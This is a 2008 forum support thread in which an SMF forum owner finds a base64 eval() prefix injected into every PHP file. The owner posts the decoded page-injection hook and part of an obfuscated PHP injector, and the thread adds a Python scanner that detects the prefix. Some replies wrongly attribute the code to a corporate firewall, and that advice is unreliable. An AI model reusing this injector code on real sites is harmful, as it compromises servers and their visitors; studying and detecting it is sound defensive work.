8: Undefined index: dhhag

Started by FUBAR, September 20, 2008, 03:54:53 AM


FUBAR

Link to my site:
SMF version: SMF ver. 1.1.6 (Upgraded tonight from 1.1.5)
TP version: TP v1.0.5 beta 1
Theme name and version: Default + All Others
Mods installed:
1.     SMF Poll Mod      1.2      
2.    SMF 1.0.14 / 1.1.6 Update    1.0    
4.    Users Online Today Mod    1.4.0    
5.    Auto Embed Video/Audio Clips    3.1.2    
6.    PM Popup - Uses Active Window    1.3    
7.    TinyPortal    1.052    
8.    SMF Gallery Lite    1.8.3    
9.    Ultimate Profile    0.8.5    
10.    Custom Profile Field Mod

Related Error messages:

8: Undefined index: dhhag
File: /home/website/public_html/forum/Themes/default/languages/Post.english.php (eval?)
Line: 1

8: Use of undefined constant path - assumed 'path'
File: /home/website/public_html/forum/Themes/default/languages/TPShout.english.php (eval?)
Line: 1

8: Undefined index: dhhag
/home/website/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php(1) : eval()'d code(1) : eval()'d code
Line: 1

8: Use of undefined constant path - assumed 'path'
File: /home/website/public_html/forum/Themes/cargo115/Display.template.php (eval?)
Line: 1

8: Use of undefined constant port - assumed 'port'
File: /home/website/public_html/forum/Themes/cargo115/Display.template.php (eval?)
Line: 1

2: gzinflate() [<a href='function.gzinflate'>function.gzinflate</a>]: buffer error
File: /home/website/public_html/forum/Themes/default/languages/Arcade.english.php (eval?)
Line: 1


I noticed recently that my error log is getting filled very quickly with these types of errors. I haven't done anything new with my site for a while and it was error free last time I checked because everything was installed fresh. I tried to run a search here and on SMF's site for similar errors but couldn't find anything related. I actually have more variations of these errors but didn't want to fill the thread with all of them.

Also note, I think all the errors have "Line: 1" at the end of them.

Please let me know if I can provide any more information and any help would be greatly appreciated.

IchBin

None of the errors look like they are TP related other than the path one. Even that one I doubt is related. The best thing you can do is start troubleshooting to see where they happen. If the error happens on every page you should look in the index.template.php. If it only happens on a single page, then you should look in the corresponding file for that page to see if you can find the same text.

FUBAR

I think I figured out what is creating these errors but have no idea how this happened.  I checked the .php files on my forum and entire site and found code added to EVERY .php file on my site.  It's the same code on every file and it's at the very top of the page.  The code is base64 and has to be decoded to be read properly and looks like this....

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdlmKGZpbGVfZXhpc3RzKCcvaG9tZS92b3dvZmF
wYS9wdWJsaWNfaHRtbC9mb3J1bS9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3Zvd29m
YXBhL3B1YmxpY19odG1sL2ZvcnVtL0ZDS2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ
1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZig
kZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDAp
LCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50L
UVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO
31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='
)); ?>


When decoded it looks like this...

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/mywebsite/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/mywebsite/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

I'm not sure how this got added to every .php file on my site and have no idea how I could possibly fix this. 

Ideas on how this happened or any help would be greatly appreciated.
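
A read-only way to find this prefix across a site, as an added example that is not part of the original posts: it matches the `<?php /**/eval(base64_decode('...')); ?>` header at the very top of a file, decodes the blob without ever executing it, and lists the `include_once` paths the payload refers to. The function names, the sample payload and the `/srv/example/...` path are constructed for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

# Shape of the prefix quoted in the thread, anchored at byte 0 of the file:
#   <?php /**/eval(base64_decode('...')); ?>
INJECTED = re.compile(
    rb"\A\s*<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=\s]*)'\s*\)\);\s*\?>[ \t]*\r?\n?"
)
INCLUDE = re.compile(rb"include_once\('([^']+)'\)")


def inspect_php(data):
    """Return (decoded_payload, included_paths, cleaned_bytes), or None if no prefix."""
    m = INJECTED.match(data)
    if m is None:
        return None
    try:
        # Decode for reading only; nothing here is ever evaluated.
        payload = base64.b64decode(re.sub(rb"\s+", b"", m.group(1)), validate=True)
    except (binascii.Error, ValueError):
        payload = b""  # damaged or hand-edited blob: still report the file
    paths = sorted({p.decode("utf-8", "replace") for p in INCLUDE.findall(payload)})
    return payload, paths, data[m.end():]


def scan(root):
    """Map each prefixed .php file under root to the paths its payload includes."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        try:
            result = inspect_php(path.read_bytes())
        except OSError:
            continue  # unreadable file: skip it, do not abort the sweep
        if result is not None:
            hits[str(path)] = result[1]
    return hits


# Constructed sample (not taken from the thread): a harmless payload with the same shape.
SAMPLE_PAYLOAD = b"if(file_exists('/srv/example/icons/32/sample.php')){include_once('/srv/example/icons/32/sample.php');}"
SAMPLE_FILE = (
    b"<?php /**/eval(base64_decode('" + base64.b64encode(SAMPLE_PAYLOAD) + b"'\n)); ?>\n"
    b"<?php echo 'original page'; ?>\n"
)

if __name__ == "__main__":
    print(inspect_php(SAMPLE_FILE)[1:])
```

Run `scan()` on the web root; the paths it reports are the files the prefix loads, and they need removing along with the prefix itself.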

Zetan

Are you editing files behind a corporate firewall/proxy?

Those kinds of errors can occur depending on the level of security. My company firewall will rip the code to shreds on a save. Example in part, Google Ad block (Scroll to the right):


<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+/show_ads.js">
</script>


It's inserted a load of gobbledygook.. That may not be your problem, but it can happen depending on firewall settings. It doesn't look like a hacking attempt, those look more structured.





G6Cad

The debug code is used to verify that scripts used are valid.

The line 1 error makes me think you have code added to any block or article (probably article as the FCKEditor is involved somehow)

What content have you added to your articles and blocks? And where are you on the site when these errors show up?

FUBAR

@ ZTN - I may have done some editing at work and they would definitely have some type of security or firewall as I work for a bank.  I haven't edited any files directly but I have edited some of the blocks or modified theme files.  I don't see this extra code on my blocks but it is on every .php file on my site at the top of the page. 

@G6 - These errors seem to happen on every page I'm on and I think it's because this code is on every file on my site.  The code that's added is in my previous post and it is added to every file but not the blocks or articles.

Zetan

Quote from: FUBAR on September 22, 2008, 08:58:49 AM
@ ZTN - I may have done some editing at work and they would definitely have some type of security or firewall as I work for a bank.  I haven't edited any files directly but I have edited some of the blocks or modified theme files.  I don't see this extra code on my blocks but it is on every .php file on my site at the top of the page. 

I would experiment, then you can establish whether the firewall is the cause.. If it is, there is nothing you can do about it, other than have fresh files and avoid editing while at work.

BTW.. Yr SACKED!  :2funny:

FUBAR

Well I hope not.  lol  ;)

I think I'm getting a little closer and found something else that seems a little odd.

I think I found some extra files in this directory...

/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32

Here's an image of the files...


The files have huge amounts of base64 code in them and some of it decodes similar to the errors I'm getting.

function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(file_exists($GLOBALS['dgcp'] . 'u')){ if(!$R399036803A841185E4A270BC666A66CF){ echo"stop flag ['u'] found<br>[465476673]"; } return; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgcp'].$GLOBALS['dgin'])){return;} touch($GLOBALS['dgcp'] . 'u'); $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)."<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path</b><br>[44883279]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path set to {$GLOBALS['dgcp']}</b><br>[5482745]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set name</b><br>[58819152]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">name set to {$GLOBALS['dgin']}</b><br>[2246876]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgep\'] = "', '";', $GLOBALS['dgep'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to 
exploit successfully set to {$GLOBALS['dgep']}</b><br>[8799102]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}</b><br>[5893301]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgfxp\'] = "', '";', $GLOBALS['dgfxp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to the file for fix successfully set {$GLOBALS['dgfxp']}</b><br>[5018843]<br>"; } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); $RE477255A8507A54E5CA56CA24210B7DB = strval(strlen($RCFFAE742FB4E724571041779A10EFDA9)); while(strlen($RE477255A8507A54E5CA56CA24210B7DB) < 7){$RE477255A8507A54E5CA56CA24210B7DB = '0' . 
$RE477255A8507A54E5CA56CA24210B7DB;} if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '"00'.'0', '";', $RE477255A8507A54E5CA56CA24210B7DB)){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set size</b><br>[86612935]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"my packed size: $RE477255A8507A54E5CA56CA24210B7DB<br>"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgcp'].$GLOBALS['dgin'], $RCFFAE742FB4E724571041779A10EFDA9, "<b style=\"color:green\">{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b><br>", 1, $R399036803A841185E4A270BC666A66CF); if(!$R399036803A841185E4A270BC666A66CF){ echo "<h3>INJECTING PHP FILES</h3>"; } F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgdr'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); if($GLOBALS['dgsp']){ F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgsp'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); } F52293B786F39B90808D05A2530BA5100(1); if(!$R399036803A841185E4A270BC666A66CF){ echo "<hr><b>dgok</b>"; }}

I only decoded part of it because it's massive...

Do you think this is some type of hack?

Zetan

Well, I don't know.. other than what I already suggested. The files look as if they have been processed, firewalls do this to make dangerous scripts useless. They will often flag harmless scripts too. Like an overzealous antivirus program.

FUBAR

I just found this as well running a Google search on FCKeditor exploit.

http://securityreason.com/exploitalert/4572

Do you think this could be related? 
